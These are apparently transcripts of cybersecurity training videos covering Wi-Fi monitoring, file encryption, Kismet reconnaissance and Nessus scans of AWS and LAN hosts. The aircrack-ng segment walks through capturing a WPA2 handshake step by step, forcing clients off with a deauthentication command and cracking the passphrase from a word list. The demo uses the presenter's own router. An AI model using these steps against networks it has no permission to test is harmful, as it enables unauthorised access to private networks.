[Video description begins] An app called "eero" opens. [Video description ends]
So I've got three eero devices. The one labeled on the left here is Living Room. I've got a Basement one, where I can see ten devices are connected, and I've got a Hallway upstairs one, where I can see that four devices are connected. We can also see the status of other things, such as whether the nightlight option is turned on for a device, its specific IP address, and its firmware version number.
So we want to make sure we keep those up to date. We can see whether there is an update available when we go into each of these devices and take a look. If it says there's an update available, tap to begin update; that is something we want to make sure we do, and document, in case there are security vulnerabilities. Back on the main page at the very top, I can see I've got 17 connected devices. I'm going to click on that, so I can see the vendors and which devices are idle. And I can also click on any one of those to get further details.
[Video description begins] He clicks a device name called "HFX-HFX-LP81378" and the device details are
displayed. [Video description ends]
So this device happens to be connected to the five gigahertz network through the Basement eero access point
device. I can see the current activity here in terms of downloads and uploads. I can see it's an Intel device, the
IP address, the MAC. And I even have an option at the bottom to block that device from connecting to the
network if I don't recognize it. But I do recognize it, so I don't need to do that, so I'm going to go back. And I'll
do that twice. You can also see the top devices by usage here at the very top.
[Video description begins] He again clicks the HFX-HFX-LP81378 device name and the device details are displayed. [Video description ends]
So if I were to click on one of these, I get a sense of the devices that have the most activity for downloads and
uploads. So if you're having network congestion issues, you can look at that. Also at the bottom I can see the
overall bandwidth available on this wireless network through those three access points. So at 351 megabits per
second to download, and 11 megabits per second up. Now if I go into some of the config settings for this app,
so I'm just going to go into Network Settings, one important thing I might consider is Notifications.
First of all, Software updates. So I want to know when the network is updated. That would be good. So I'm
going to TURN ON NOTIFICATIONS for that and down below, New devices. Do you want to be notified
when a new device joins your network? I most certainly do on this phone. So I'm going to go ahead and turn
that on. And then we're good to go. So it's just something to think about even on smaller networks, especially
in a wireless environment with multiple access points. You may want to take a look at the specific
configuration and turn on some of these simple options that can go a long way in securing your Wi-Fi network.
[Video description begins] Topic title: Third-party File Encryption. The presenter is Dan Lachance. [Video
description ends]
There are many security standards and laws and regulations that will require the protection of data at rest for
sensitive data. In other words, confidentiality through encryption.
[Video description begins] He opens the File Explorer window. [Video description ends]
And there are many ways to do that. Here in Windows, if this is on a disk that supports BitLocker, I could use
BitLocker disk encryption.
[Video description begins] He right-clicks a file called “HR_EmployeeList.xlsx” and selects an option called
“Properties”. A dialog box called “HR_EmployeeList.xlsx Properties” opens. It contains tabs called
"General", "Security", "Details", and "Previous Versions". The General tab is selected. It includes a button
called "Advanced". [Video description ends]
I could right-click on the file and go into the Properties. And under Advanced, if the machine supported it, I
would be able to choose encrypt contents, that's Encrypting File System.
[Video description begins] He clicks the Advanced button and a dialog box called "Advanced Attributes"
opens. [Video description ends]
The reason it's grayed out here is because I'm doing this on a Windows 10 Home Edition computer. One of the features that's unavailable in the Home Edition is EFS or Encrypting File System on NTFS volumes.
[Video description begins] He clicks a button called "Cancel" and the dialog box closes. [Video description
ends]
[Video description begins] He clicks a button called "Cancel" and the HR_EmployeeList.xlsx Properties
dialog box closes. [Video description ends]
I've already installed a tool called AxCrypt. This is a free third-party encryption and decryption tool. So I'm
going to right-click on my file, and in the context menu, you can see I've selected AxCrypt. I'm going to
choose Encrypt. And when I do that, it wants me to enter a passphrase and verify it.
[Video description begins] A dialog box called "AxCrypt 1.7.2976.0"opens. [Video description ends]
So I'm going to go ahead and do that. Now optionally, instead of a passphrase, I could specify a key file that
would be used for encryption and decryption. But I won't do that and I don't want to turn on any of these
defaults. I just want to encrypt the file. So I'm going to click OK. And notice that the icon changes, plus we
also have the axx file extension.
[Video description begins] He clicks a button called "OK" and the dialog box closes. [Video description ends]
So if I try to open up that file, it says, well, it's encrypted, enter the passphrase.
[Video description begins] He points to a file called "HR_EmployeeList-xlsx.axx". [Video description ends]
[Video description begins] He double-clicks the HR_EmployeeList-xlsx.axx file name. The AxCrypt 1.7.2976.0
dialog box opens. [Video description ends]
If you don't know it, you don't get in, however, I do know it. Let's go ahead and pop it in to see what happens.
[Video description begins] He clicks the OK button and the dialog box closes. [Video description ends]
All right, at this point, it looks like our file has opened up.
[Video description begins] The HR_EmployeeList.xlsx file opens in the Microsoft Excel window. [Video
description ends]
So we have a very simple way to encrypt and decrypt files using third-party tools, even if we have entire
subdirectories.
[Video description begins] He closes the Microsoft Excel window. [Video description ends]
[Video description begins] He double-clicks a folder called "Projects". [Video description ends]
[Video description begins] He right-clicks a folder called “Projects”. [Video description ends]
So I can right-click on Projects, choose Encrypt, and I'm going to go through and enter a passphrase and verify
it, just like it did with the individual file. Okay, and I'll click on OK.
[Video description begins] The AxCrypt 1.7.2976.0 dialog box opens. [Video description ends]
And after a second, if I go into Projects, everything is encrypted automatically. So this is great. We have the ability to easily encrypt and decrypt items by simply right-clicking on them. There are many tools that will do this, and many of them are free and use very strong encryption.
[Video description begins] He right-clicks the Projects folder. A dialog box called “About AxCrypt 1.7.2976.0” opens. [Video description ends]
For example, if I go to AxCrypt and choose About, I can see some of the details, such as the version and the copyright year, from which I could then learn more about it in terms of the encryption ciphers being used. So if I pop open a web browser and use my favorite search engine, I can search up axcrypt encryption cipher. And we can see it uses AES-128 and AES-256 encryption.
[Video description begins] He opens the Google search. [Video description ends]
In this video, you will use aircrack-ng to crack protected Wi-Fi networks in Kali Linux.
Objectives
[Video description begins] Topic title: Aircrack-ng. The presenter is Dan Lachance. [Video description ends]
Brute force password attacks are a method of using a list of passwords, normally from a file, that are fed against a potential victim or target. That could be user accounts in a Microsoft Active Directory environment, or, as in our case, we could be using a password file to try to brute force the password for a WPA2-protected Wi-Fi network.
[Video description begins] He opens a web site called “router.asus.com/index.asp”. It contains a page, which
is divided into three parts. The first part includes buttons called “Logout” and “Reboot”. The second part is a
navigation pane. The third part is a content pane. The content pane includes two sections. [Video description
ends]
So here, I've got the configuration page in my browser pulled up for our sample wireless router. This is a wireless router entirely under my control for testing purposes. You don't want to run these kinds of tests against wireless routers that you don't have permission to test. It could be considered illegal to try to crack these passwords because there is an expectation of privacy, so be careful how you use these tools. If I click in the WPA-PSK field, the Pre-Shared Key field, I can see that a variation of the word password is the password for this Wi-Fi network.
I can also see the wireless network name, the SSID, up at the top here, the wireless network is called RT-
N600_28_2G.
[Video description begins] He opens a command prompt window called "dlachance@kali: ~". The following
prompt is displayed: root@kali:~#. [Video description ends]
Here in Kali Linux, I'm going to type iwconfig where I can see I've got a wireless network interface here called
wlan0.
[Video description begins] He executes the following command: iwconfig. The output displays the details of
the interfaces. The prompt does not change. [Video description ends]
What I need to do is put that into what's called monitoring mode. Because what we want to do is watch any
conversations between clients that are authenticating to the wireless router. If we can capture that traffic, we
can then try to brute force it to guess what the password is.
[Video description begins] He clears the screen and the prompt does not change. [Video description ends]
So here I'm going to run airmon-ng; I want to monitor network traffic. I want to start it, and the interface I want to do that for is wlan0.
[Video description begins] He executes the following command: airmon-ng start wlan0. The output displays
the details of the wlan0 interface. The prompt does not change. [Video description ends]
Now what we're trying to do here with monitoring traffic, we want to capture any clients that are
authenticating to the wireless router. And then dump that into a capture file. And what we're going to do then is
try to brute force the password from the password list against the capture file. So I'm going to clear the screen
and type iwconfig once again.
And when I do that, notice the interface has been renamed. Now it's called wlan0mon, that's good. That means
we are now in monitoring mode. So now what we want to do is start to gather some information about clients
that will be authenticated to that wireless network. First things first, let's run airodump-ng, and right now our
interface is called wlan0mon. What I want to do with this is get a list of wireless routers in the vicinity and also
get their address information.
[Video description begins] He executes the following command: airodump-ng wlan0mon. The output displays
a list of wireless routers and their details. [Video description ends]
Each of these lines that we see here is showing me a number of different wireless networks. There's our RT,
well, it keeps changing, but there's our Arris, there's our RT-600. There's all kinds of wireless networks that
show up here. We can see if they are using WPA2 or if they're open or WPA3.
[Video description begins] He points to the entries in a column called “ENC”. [Video description ends]
And we can also see the 48-bit MAC address, the hardware address for the wireless interface in each of those wireless routers, under the BSSID column. Now, having done that, what I really want to do is just press Ctrl+C to get out of there; it says Quitting... at the bottom. The network we're interested in is this one, RT-N600_28_2G.
[Video description begins] He points to the entry in the “ESSID” column. [Video description ends]
We can see it's listening on channel 9. And we can also see its MAC address, which I'm going to select and copy. Now, why did I copy that? Because we need to focus our attention on monitoring traffic for clients authenticating to that specific interface on that wireless network. Okay, so having done that, how do we make that happen?
[Video description begins] He clears the screen and the prompt does not change. [Video description ends]
So now we're going to run airodump-ng --bssid, and I'm going to right-click to paste in the MAC address of the Wi-Fi interface in our wireless router. Then I'm going to specify -c 9, because remember that wireless network is using channel 9 for communications. I'll use the --write parameter to write out to a file; I'm going to do that by specifying a location, in this case / (the root of the file system on this host) and wpa, which will be the prefix for the capture file names. And finally, I need to specify the interface I want to capture on, and we know that it's now called wlan0mon.
[Video description begins] He executes the following command: airodump-ng --bssid 34:97:F6:A8:0F:28 -c 9
--write /wpa wlan0mon. The output displays the details of the RT-N600_28 wireless network. [Video
description ends]
When I press Enter, what I'm seeing at the top here is simply a reference that yes, that is the MAC address of
that wireless network. What I want to do at this point is make a connection from a client device. So I'm going
to use my smartphone to make a connection to that wireless network.
[Video description begins] The details of the RT-N600_28_2G wireless network display. [Video description
ends]
And sure enough, we can now see that we've got a connection on our wireless network from a client device.
[Video description begins] He highlights "34:97:F6:A8:0F:28" in the BSSID column. [Video description ends]
Now, what matters is that we're capturing traffic when that occurs. If clients are already connected, we can actually de-authenticate them; there is a command in Linux that will allow us to do that, the aireplay-ng command. You can de-authenticate them, which forces a re-authentication, then hang around and wait for that to happen. In this case, we just happened to see a client connect, so we're ready to go. I'm going to leave that open and switch to another terminal screen for Kali Linux. But before we do that, just note that we know we've got what we need because we can see the WPA handshake was captured.
[Video description begins] He highlights the text: "WPA handshake: 34:97:F6:A8:0F:28". [Video description
ends]
We see this in the upper right. We don't see what it is but we know it was captured. So now we can compare
our brute force password list against this.
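As an aside, if no client had connected on its own, the aireplay-ng command mentioned a moment ago could be used to force a re-authentication. This is a rough sketch, assuming the same BSSID and monitor-mode interface from this demo, with an arbitrary count of de-authentication frames:

aireplay-ng --deauth 5 -a 34:97:F6:A8:0F:28 wlan0mon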
[Video description begins] The following prompt is displayed: root@kali:~#. [Video description ends]
So back here in Kali Linux in the second terminal window, I'm going to use the cat command to take a look
at /usr/share/wordlists/. And I've got a sample text file where I've placed just a handful of password variations
so we can expedite this example.
[Video description begins] He executes the following command: cat /usr/share/wordlists/sample.txt. The
output displays the content of the file. The prompt does not change. [Video description ends]
Realistically, you would have a larger file. And if I just press the up arrow key and change the file name, there is a sample here in Kali Linux called rockyou.txt. That's a much larger file with many, many variations, as you can see.
[Video description begins] He executes the following command: cat /usr/share/wordlists/rockyou.txt. The
output displays the content of the file. The prompt does not change. [Video description ends]
And so there's no specific amount of time it might take to crack a password through brute force mechanisms. However, it's going to be much quicker here because we have just a tiny sample.txt file.
[Video description begins] He clears the screen and the prompt does not change. He executes the following
command: cat /usr/share/wordlists/sample.txt. The output displays the content of the file. The prompt does not
change. [Video description ends]
Okay, let's make this happen. First things first, we want to make sure we know which capture files are currently being used. So I'll do an ls of the root for any files that end with .cap; remember, we used the prefix of wpa when writing the output.
[Video description begins] He executes the following command: ls /*.cap. The output reads: /wpa-01.cap. The
prompt does not change. [Video description ends]
So there's the file, wpa-01.cap; that's important to know, and you'll see it as we enter this next command. What we're going to do is run aircrack-ng and specify the name of the capture file on the root that we're interested in, so that would be /wpa-01.cap. The next thing we have to do is specify our word list with -w; that's the /usr/share/wordlists/sample.txt file we just looked at a moment ago. That's it, press Enter.
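Put together, the full command looks something like the line below, using the capture file and word list paths from this demo; treat it as a sketch of the command being typed here.

aircrack-ng -w /usr/share/wordlists/sample.txt /wpa-01.cap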
And immediately, this is what we're looking for. It found the key. It knows that the passphrase to connect to
this WPA2 wireless network is shown here as a variation of the word password.
[Video description begins] He highlights the text: KEY FOUND! [ Pa$$w0rdABC123 ] in the output. [Video
description ends]
Now, we're lucky here that it was very quick because we have a tiny word file. In reality, it could take much longer than this, but it is possible.
During this video, you will learn how to use Kismet to detect wireless networks.
Objectives
[Video description begins] Topic title: Kismet. The presenter is Dan Lachance. [Video description ends]
One tool that can be used to perform reconnaissance for Wi-Fi networks is to use the Kismet tool, which is
built in to Kali Linux.
[Video description begins] A command prompt window called “dlachance@kali: ~” opens. The following prompt is displayed: root@kali:~#. [Video description ends]
To get started here in Kali Linux, I'm going to run iwconfig to list my wireless interfaces, and here I have one called wlan0.
[Video description begins] He executes the following command: iwconfig. The output displays a list of
wireless interfaces and their details. The prompt does not change. [Video description ends]
The first thing I need to do is put that interface into monitoring mode so we can see all of the traffic and
capture it. So to do that, I'm going to go ahead and run airmon, air monitor -ng start and then the name of my
interface wlan0.
[Video description begins] He executes the following command: airmon-ng start wlan0. The output displays
the details of wlan0. The prompt does not change. [Video description ends]
Now after this is completed, I'm going to run iwconfig again because it will have renamed my interface, so
iwconfig.
[Video description begins] He executes the following command: clear. The screen gets cleared and the prompt
does not change. [Video description ends]
And notice now it's called wlan0mon. Having done that, I'm going to run kismet with -c, lowercase, and tell it the name of my interface, wlan0mon.
[Video description begins] He executes the following command: kismet -c wlan0mon. The output displays the
information of wlan0mon. The prompt does not change. [Video description ends]
The first time you run Kismet, it'll tell you to connect to localhost on port 2501 to enter an admin username and password for the web GUI, which I've already done. Now we can see here it's already collecting information about Wi-Fi devices in the vicinity. The higher the gain of the antenna on the machine running this, the further away the devices you'll be able to see. Let's switch over to the web GUI. So I've connected to the IP address of my Kali Linux installation on port 2501.
[Video description begins] He opens a web page called "Kismet". It is divided into two parts. The first part
includes a table with several columns and several rows. The column headers include: Name, Type, Crypto,
Signal, and Channel. The second part contains tabs called “Messages” and “Channels”. [Video description
ends]
And I've authenticated with the username and password I specified for the web GUI, and this is what we see. We have all Wi-Fi devices shown here in the list. We can see the name of the device or the wireless network, and in some cases, you might only see a MAC address under the Name column. When you see only a MAC address, that implies it's a device that hasn't been configured with a name, or it could be one where the name is being cloaked or hidden. In other words, it's being suppressed, and that's something that can be done in a wireless environment to help increase security. Although, technically, let's say I paste into the search field here in the upper right a MAC address I know exists for a wireless network.
[Video description begins] The details are displayed in the table. [Video description ends]
We can see it does show up here. And if I click on it to open up some of the details, if I open up the Wi-Fi
section, we can see currently the SSID is being shown as cloaked or empty.
[Video description begins] The corresponding window opens. He expands a section called “Wi-Fi
(802.11)”. [Video description ends]
So even though this is a wireless network where the SSID, the name of the WLAN, isn't being broadcast, it still shows up. It has to be present at the radio frequency level, otherwise clients would never be able to connect. I can also see that there's a related item listed down below, and it's an access point.
[Video description begins] He expands an option called "Related to 34:97:F6:A8:0F:2C (RT-
N600_28_2G_5G)". [Video description ends]
Well, it's got the same MAC address, but a different name. What this is telling me is that in the past, that used
to be the name of the wireless network associated with this MAC address, but currently it's cloaked. So
perhaps it's been hardened recently.
[Video description begins] He points to RT-N600_28_2G_5G and then points to 34:97:F6:A8:0F:2C. [Video
description ends]
The next thing you'll notice is any clients connected to that Wi-Fi network. So I've got a client here. I can clearly see the MAC address, and apparently it's a Motorola device, perhaps a Motorola-based smartphone; it says Motorola Mobility.
[Video description begins] He expands an option called “Client 5C:51:88:88:F1:59”. He highlights the
following text: Name 5C:51:88:88:F1:59. [Video description ends]
So Kismet can serve as a great reconnaissance tool to learn which wireless devices are within range, depending on how powerful your antenna is. But at the same time, it's great for site surveys as well, for example, to ensure that a wireless network does not send signals beyond the edge of a property.
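For reference, here is a minimal sketch of the command sequence demonstrated in this video, assuming a Kali Linux host with a wireless adapter named wlan0 that supports monitor mode (your interface name may differ):

  iwconfig                      # list wireless interfaces and confirm the adapter name
  airmon-ng start wlan0         # put the adapter into monitor mode (it gets renamed to wlan0mon)
  iwconfig                      # verify the new monitor-mode interface name
  kismet -c wlan0mon            # start Kismet capturing on the monitor-mode interface
  # then browse to http://localhost:2501 and sign in with the web GUI credentials you created

Treat this as a sketch rather than a definitive procedure; adapter names and driver support for monitor mode vary from system to system.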
In this video, you will learn how to use Nessus to audit Amazon Web Services (AWS).
Objectives
[Video description begins] Topic title: Cloud Vulnerability Scanning. The presenter is Dan Lachance. [Video
description ends]
One of the most fundamental tasks that you can perform as a cyber security analyst is to conduct periodic
assessments of security controls. And that means running periodic scans or audits of a variety of different types
of systems. In this case, we're going to run a vulnerability scan of Amazon Web Services. Now there are many
ways to do that, one of which is using the Nessus tool which I've already got installed.
[Video description begins] He opens a page called “nessus Professional” in a web browser. It is divided into
three parts. The first part is a menu bar. The second part is a navigation pane. The third part is a content
pane. A page called "My Scans" is open in the content pane. It includes a table with three columns and three
rows. [Video description ends]
And I've connected to Nessus here on my local host, it's listening by default on port 8834. Now once you've
signed into Nessus and gone to the My Scans folder, you have the ability to define New Scan details, which
I'm going to do. So I'm going to click the New Scan button in the upper right, since we're here to scan our AWS cloud environment.
[Video description begins] A page called "Scan Templates" opens. [Video description ends]
Naturally, you have to have an AWS account with some resources deployed, which I do. So I'm going to scroll
all the way down to the COMPLIANCE section where I'm going to choose Audit Cloud Infrastructure.
[Video description begins] A page called "New Scan / Audit Cloud Infrastructure" opens. [Video description
ends]
For the Name of the scan, I'm going to call it My AWS Scan, and I'm going to go to the Credentials section,
click on Amazon AWS.
[Video description begins] He selects a tab called “Credentials”. The corresponding page opens. [Video
description ends]
But notice we can also audit Microsoft Azure, Office 365, Rackspace, and Salesforce.com. Now for AWS, I need to supply the AWS Access Key and Secret Key. These can be generated, for example, when you first sign up for AWS. The AWS access key is always available; you can view it in the AWS management console GUI. The secret key is something you would have downloaded along with the access key, so you need to safeguard that file.
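As an aside, if you prefer the command line, a hedged sketch of creating an access key with the AWS CLI might look like the following, assuming the CLI is installed and configured and that you have an IAM user named, hypothetically, nessus-scanner with permission to manage its own access keys:

  aws iam create-access-key --user-name nessus-scanner
  # the response includes AccessKeyId and SecretAccessKey; the secret is shown only once,
  # so store it securely, just as you would the downloaded key file

The console workflow shown in this video accomplishes the same thing.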
[Video description begins] He opens a web page called "AWS Management Console". [Video description
ends]
So here in the AWS Management Console, how would I go about at least seeing the access key or maybe
generating a new access and secret key? All you would do is go to your account name once you sign in in the
upper right, which I'll click on, and then you would choose My Security Credentials.
[Video description begins] A web page called "IAM Management Console" opens. [Video description ends]
That opens up the IAM management console, what you want to do is on the right, you want to open up Access
keys.
[Video description begins] He expands an option called “Access keys (access key ID and secret access
key)”. [Video description ends]
You'll see any access keys that might have been created, what you won't see is the secret key. Now, both of
them can be downloaded when you create a new access key. So the access key and the secret key, you can
download those and save them. So I've already done that so I'm going to go ahead and fill in the details here.
[Video description begins] He switches to the nessus Professional page. [Video description ends]
This is required because it's how Nessus will authenticate to AWS to run the vulnerability scan.
[Video description begins] He enters the value in text boxes called “AWS Access Key ID” and “AWS Secret
Key”. [Video description ends]
Once I've done that, down below I have to specify the AWS geographical regions in which I have resources deployed, like virtual machines, web apps, storage, all that stuff. So I can select the ones that I'm interested in. In this case, I'm going to choose us-east-1 and ca-central-1 because I know I've got resources in those locations. Now, I can go under Plugins and choose exactly which items I wish to include beyond the default settings that will be scanned for.
[Video description begins] He selects a tab called “Plugins”. [Video description ends]
[Video description begins] He selects a tab called “Compliance”. [Video description ends]
CIS stands for Center for Internet Security, so I can look at some Amazon Web Services best practices that we
can check against for that.
[Video description begins] He selects an option called "CIS Amazon Web Services Foundations L2
1.2.0”. [Video description ends]
I'm going to do that for Web Services Foundations, also Three-tier Web Architecture.
[Video description begins] He selects an option called "CIS Amazon Web Services Three-tier Web
Architecture L2 1.0.0”. [Video description ends]
So I've got all of these items available here, and I can also filter them for Amazon AWS, so it's really up to me what I want to do.
[Video description begins] He selects a drop-down list box called "CATEGORIES" and selects an option
called "Amazon AWS". [Video description ends]
So I've selected a couple of items here, and I'm going to go ahead and click Save. I didn't schedule it, but I could have scheduled that AWS scan.
[Video description begins] The My Scans page opens and a scan called "My AWS Scan" is displayed in the
table. [Video description ends]
But instead I'm going to go ahead and select it here by putting a checkmark in the box and over on the far right,
I'm going to click the Launch button. And we'll then see that our AWS scan has begun, so we can see it started
here along with another scan that's running in the background. Before too long we'll see that the AWS scan has
completed, so let's click on it and take a peek at what we've got.
[Video description begins] A page called "My AWS Scan" opens. It includes a Compliance status bar. [Video
description ends]
This doesn't look good, there's a lot of red. And red here means that based on what it scanned in my AWS
account in the selected regions, there are a lot of non-compliant items. At least as compared to the Center for
Internet Security best practices. So let's click and let's see what's going on.
[Video description begins] He clicks the Compliance status bar and the corresponding page opens. [Video
description ends]
All right, something about a Customer Master Key, a CMK. I need to make sure I have one created that can be
used for encryption, instead of allowing Amazon to generate the keys and use those keys.
[Video description begins] He clicks an option with a failed severity and the corresponding page
opens. [Video description ends]
So sometimes for regulatory compliance, you need to control the keys that are used for encryption as opposed
to a cloud service provider. Let's go back to the vulnerabilities.
[Video description begins] He clicks a tab called “Vulnerabilities” and the corresponding page opens. [Video
description ends]
I should make sure that my ELB, Elastic Load Balancer is using an HTTPS listener. Well, that's kind of
important, so I can scroll through a lot of these things to find out what it is I need to do to harden my
environment. We can also see items such as VPC flow logging not being enabled in all VPCs. In Amazon Web Services, a VPC is just a virtual network defined in the cloud, and flow logging allows you to monitor the traffic. But you can see there are some compliance items here that have passed, such as ensuring that hardware MFA or Multi-Factor Authentication is enabled for the root account. All of these items, of course, can then be written out to a report, whether in PDF, HTML, or CSV format.
[Video description begins] He clicks a drop-down list box called "Report" and selects an option called "PDF".
A dialog box called "Generate PDF Report - 1 Host Selected" opens. [Video description ends]
I'm going to go ahead and render this as a PDF report, I'm going to click Generate Report.
[Video description begins] He clicks a button called "Generate Report". A PDF file called "AWS.pdf"
opens. [Video description ends]
And after the report is rendered, this is kind of what it looks like, let me just go ahead and kind of reduce the
zoom, just so we get a sense of what we're looking at here. So we've got an executive summary and we can see
the audit checks and what has passed and what has failed. So we know where to focus our energy to harden our
AWS cloud computing environment.
In this video, you will use Nessus to scan LAN hosts for malware.
Objectives
It's absolutely crucial, where possible, to ensure that every computing device, whether wired or wireless, has
an anti-malware scanner on it. Now, in some cases, that's not possible. Perhaps with some IoT devices, you
can't install that component because it's basically firmware that doesn't allow that configuration. Or you might
have specialized equipment such as for aviation engine diagnostics, or medical equipment that just doesn't
allow it, in which case, those devices should be isolated on a separate network.
[Video description begins] The nessus Professional page opens in a web browser. The My Scans page is open
in the content pane. [Video description ends]
However, I can use tools like Nessus, which I've logged into here, I've got my own local installation. I can use
Nessus to run many different types of vulnerability scans, including malware scans. So I can have a central
way to reach out to devices on the network and connect to them, ideally with credentials, so I can specify
those, and look for malware. Let's do that. So I'm in the My Scans folder here in Nessus, I'm going to click the
New Scan button in the upper right, and I'm going to conduct a Malware Scan.
[Video description begins] The Scan Templates page opens. [Video description ends]
So I'm going to click on that. I'm going to call this Scan for Malware - East1 LAN.
[Video description begins] He clicks an option called “Malware Scan” and a page called "New Scan /
Malware Scan" opens. It includes tabs called "Settings", "Credentials", and "Plugins". The Settings tab is
selected. [Video description ends]
Next thing I want to do is click Credentials, because here I can specify credentials for SSH as well as for
Windows.
[Video description begins] The corresponding page opens. He clicks a drop-down list box called
“Authentication method” and points to the drop-down options. [Video description ends]
So for example, if I were to click SSH, I can determine the Authentication method, whether it's public key or
password-based authentication, or whether I have a PKI certificate for authentication. And I can do the same
type of thing for Windows.
[Video description begins] He selects an option called “certificate”. [Video description ends]
So when I click Windows, it adds it to the list over here down below the SSH settings. Same kind of thing, I
can choose the Authentication method and fill in the details. This would be a credential scan then, and this is
important in this context because when you're looking for malware, you really want to be able to dig deep into
the specific host. And by providing credentials to log in, we can do that.
Notice that if you have multiple sets of credentials, so maybe I've got different Windows hosts with different
credentials out there on the network, you can click Windows again and it adds another instance of that
credential set. So basically, you can configure your credential sets the way you wish. Then I'm going to go under Plugins, where I could select just Backdoors, which would be a quicker scan than selecting everything. But I want to select everything so I can have an in-depth, comprehensive scan result.
[Video description begins] The other options include: “General”, “Windows”, and “Web Servers”. [Video
description ends]
Under Settings, I can also go to Schedule and enable this to kick off automatically periodically, but I won't do
that in this case.
[Video description begins] He selects a link called “Schedule” in the navigation pane and the corresponding
page opens in the content pane. [Video description ends]
So I'm just going to go ahead and fill out my credentials and then I'm going to save this scan. The last thing I'll
do under Settings before I save it is specify the target. In this case, it's going to be every device on my LAN, so
I'm going to specify it in CIDR notation.
[Video description begins] He enters 192.168.4.0/22 in a text box called "Targets". [Video description ends]
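As a quick check of that CIDR notation, 192.168.4.0/22 means the first 22 bits are the network prefix, leaving 10 host bits, so the target range covers 2^10 = 1,024 addresses, from 192.168.4.0 through 192.168.7.255. If the ipcalc utility happens to be installed on your system, something like the following can confirm the range; adjust the prefix length to match your own LAN:

  ipcalc 192.168.4.0/22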
After I've specified that, I can go back and save this. And we can see our scan has been saved.
[Video description begins] He clicks a button called "Save". The My Scans page opens and a scan called
"Scan for Malware - East1 LAN" is displayed in the table. [Video description ends]
Scan for Malware - East1 LAN, so I'm going to select it, and I'm going to click the Launch button. And after a moment, it'll pop up to the top of our list and we'll see that the scan has begun. Once our malware scan is completed, we can go ahead and click on it in the list to view the results.
[Video description begins] The corresponding page opens. Several Vulnerabilities status bars are displayed
for different hosts. [Video description ends]
The primary point of interest here, according to the legend, will be the color red, which indicates critical. And I
can see on one particular host, I've got a problem. So I'm going to go ahead and click on that red item.
[Video description begins] The corresponding page opens. [Video description ends]
We've got a critical item here, the UnrealIRCd Backdoor has been detected, and it can allow an attacker to
execute arbitrary code on the affected host.
[Video description begins] He clicks an option with a critical severity. The corresponding page opens. [Video
description ends]
So it also provides a solution. So it says, re-download this software, verify it using the MD5 / SHA1
checksum, and re-install it. So in other words, make sure that what you're downloading is the real version of
the software. And make sure it's a version that doesn't have known vulnerabilities associated with it. So I'm
going to click Back to Vulnerabilities up at the top.
[Video description begins] The corresponding page opens. [Video description ends]
We can see here a couple of other informational items, but we're not so concerned with those specifically. So
we can see that this is running on a host with the listed IP address on the right, and we can see it's a Linux-based kernel.
[Video description begins] He highlights the following text: IP: 192.168.4.56. [Video description ends]
[Video description begins] He clicks the Vulnerabilities tab. [Video description ends]
So we see our UnrealIRCd Backdoor vulnerability, and we can see that there is a count of 1.
[Video description begins] He clicks the UnrealIRCd Backdoor Detection option and the corresponding page
opens. [Video description ends]
And when you look at it from this perspective, and you scroll down to the bottom, you will see the affected
hosts.
So this is not too bad. We've got one host that needs our attention, but overall, on the network, because we can
see all of the devices that were scanned here, it looks pretty good.
[Video description begins] He clicks a link called “Back to Vulnerabilities” and the corresponding page
opens. He clicks the Hosts tab. [Video description ends]
But bear in mind that this is only going to be true based on how up-to-date the scanning engine is here in this
tool, in this case, Nessus.
[Video description begins] The corresponding page opens. He selects a tab called “Software Update”. [Video
description ends]
So if I were to click Settings up at the top, I can look at the Software Update settings to make sure that the components for this scanning tool are always kept up to date; here, the update frequency is Daily.
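As a side note on the remediation advice mentioned earlier, verifying a downloaded package against its published checksum is straightforward from a shell. This is a hedged sketch; the file name is a placeholder, not the real UnrealIRCd artifact:

  sha1sum downloaded-package.tar.gz
  # compare the printed hash to the checksum published on the vendor's official site;
  # md5sum works the same way, though SHA-1 or stronger is preferable

If the values do not match exactly, the download should not be trusted or installed.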
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined intrusion detection tools and techniques, and network traffic analysis for
detecting malicious attacks. We did this by exploring how to analyze suspicious log entries. How to view a
sample Burp Suite report, and how to use Nikto to scan a web app. We looked at how to perform a Kali Linux
cloud deployment. How to install and configure the Snort IDS tool and create a Snort IDS rule. We looked at
how to analyze an ICS traffic capture and HTTP user authentication traffic. We looked at how to perform
voice over IP traffic analysis and online network traffic analysis, as well as how to decrypt wireless traffic in
Wireshark.
Next, we took a look at the use of hashing to detect file changes through steganography. We looked at how to
use the eero app to monitor, block, and configure notifications for Wi-Fi connected devices. We looked at how
to use Aircrack-ng to crack protected Wi-Fi networks and how to use Kismet to detect Wi-Fi networks.
Finally, we looked at how to use Nessus to audit Amazon Web Services and to scan LAN hosts for malware.
In this course, you'll explore the basics of network packet capturing, a process used to intercept and log traffic
occurring over a network. You'll also examine the purpose and features of some standard tools and techniques
to preserve and analyze a computer system's most volatile data. You'll then learn to use some of these tools and
techniques to achieve various digital forensic analysis goals.
Next, you'll recognize computer forensic best practices, including locating evidence in the Windows Registry.
Finally, you'll learn how to differentiate between the purpose and features of the various tools available for
conducting hard disk forensic analysis.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview [Video description ends]
Hello, my name is Peter Adamson. I am going to be the instructor for this course on cyber crime
investigations.
[Video description begins] Your host for this session is Peter Adamson. He is a Security Software
Developer. [Video description ends]
As for my background, I am a cybersecurity expert who has been working in the field for a number of years now. I'm an experienced security software developer, as well as an experienced Red Team/Blue Team member. In this
course, we're going to explore how to perform cyber crime investigations including techniques, tools and best
practices involved in computer forensics analysis.
I'll start by examining the concept of packet capturing as it relates to cyber ops forensics and exploring
network forensics and vulnerabilities. I'll then demonstrate how to gain intelligence from an attack using
packet capturing and show how to reconstruct artifacts and files from a PCAP file using Wireshark. Next, I'll
examine working with volatile data, compare tools for conducting analysis of a computer's memory, and show
how to use the volatility framework to process an extraction of computer memory. I'll continue with an
examination of the Windows Registry and the information it contains, how to navigate the Windows Registry
to locate evidence, explore the Windows Registry tools and techniques for analyzing registry changes. I'll then
explore the categories of digital evidence and techniques to gather digital evidence, as well as the various tools
available for performing computer forensic analysis. Lastly, I'll examine the SANS Investigation Forensic
Toolkit, SIFT, and demonstrate how to mount evidence using SIFT.
[Video description begins] Topic title: Packet Captures. Your host for this session is Peter Adamson. [Video
description ends]
Now let's look at the idea of packet capturing as it relates to our cyber ops forensics. And to start, let's go with
the definition of what packet capturing is. Packet capturing is the interception of data traveling over a network. A packet is essentially a bundle of data that is being sent from one computer to another. And that bundle of
data contains communication information regarding whatever we want to talk about. So when we intercept that
data using a packet capture, we can start to analyze those conversations by looking through all of these packets
that are going and transmitting over a network.
And that's very valuable to us from a forensics point of view. So why would we do a packet capture and what
